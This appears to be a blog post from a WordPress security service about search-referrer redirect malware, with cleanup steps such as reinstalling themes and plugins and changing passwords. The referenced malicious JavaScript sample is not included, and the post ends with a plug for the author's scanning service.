Have you ever had an issue where the links in the Google or Yahoo (or other) search results redirect your visitors to some other spammy site and NOT your own site?

Well, if you do then you have malware on your site or have been hacked. The typical symptoms of this particular malware are as follows:

For example, say your site ranks well for “blueberry ice cream” search term. When someone types that search term in the Google engine they will sure enough see your site as one of the search results. But when they click on your link they get automatically redirected to someone else’s site – usually a smutty site or one selling pharma products for enlarging the male appendage or viagra or other similar sites….I’m sure you know what I mean.

However, if you were to type your website’s URL directly into the browser you would see no problem at all – ie, your site’s page will display as expected and you would not be redirected to those spammy sites.

But how is this possible I hear you ask? How can a link which you click from the Google search results and which you know has your site’s URL in it, redirect you to someone else’s site?

The first clue is to view your site’s html source:

• Using your browser, type your site’s URL directly into the address bar
• After your page loads, right-click on the page and select “View Page Source” (or similar depending on the browser you are using)

When viewing your page source you may see some malicious javascript code similar to the following if you have been infected with this type of malware:

Basically what the above javascript code is doing is that it is checking if the visitor was referred to your site from another location, eg, a Google search link.

If so, the code then spits out some more malicious javascript code where it pieces together a malicious URL with other query parameters. In this case the malicious URL is the one with the name “motaharico” in it and if you observe closely you’ll see that the full path goes directly to a php file on that server. The effect of the above code is that the visitor will be surprised to find that instead of landing on your site, they are redirected to a porn or other site.

In most cases, one of the ways the hackers achieve this clever little feat is by hacking your your site’s php files or you may have downloaded an infected theme or plugin. For this case the header.php of your active theme likely contains the offending code.

If this is happening to you, FTP into your server and grab your theme’s header.php file and look for malicious code similar to that shown in the above example. If you find such code it means at the very least that you have downloaded an infected theme or plugin, or, you have been hacked some other way which allowed the hackers to write code into your php files or add their own malicious files.

For those who have been infected with something like the above malware, at the very least you should do the following:

1. Update your wordpress version if you don’t currently have the latest release.
2. Deactivate and delete your plugins and re-install a clean fresh version for each one.
3. Deactivate and delete your active and inactive themes and re-install clean versions. (if you are not using certain themes just delete them)
4. Change your wordpress password (make sure that you use a strong password with 10 or more characters)
5. Change any passwords for your server such as FTP accounts and cpanel login
6. Change DB password and update the wp-config.php file with new password.

Always re-download fresh version of your plugins and themes from wordpress.org or the developer you got them from. Also, never download themes or plugins from untrusted sources such as sites claiming to offer “premium” plugins or themes for free which are normally sold on another site.

Sometimes the malware can be quite hard to find or it keeps coming back, and for cases like that you will need to carefully go through your file system and weed out any backdoor files and other infected files. (I also offer a malware cleaning service if you need help – just contact me directly)

I have cleaned my fair share of sites to get rid of malware for my clients and I’ve seen many interesting and disturbing ways hackers are trying to deface or hijack websites and this is one of many. We should all be vigilant when it comes to our websites because being hacked and then penalised or blacklisted by Google can be a painful experience especially when you’ve put so much effort in building your site up.

The most important thing is to be informed immediately as soon as you are infected so that you can take corrective action. One easy and cost-effective way to do this is to have your site automatically scanned daily by our malware site-scanners service. If the scanner finds any malware or suspicious content you will get an email immediately informing you about the problem.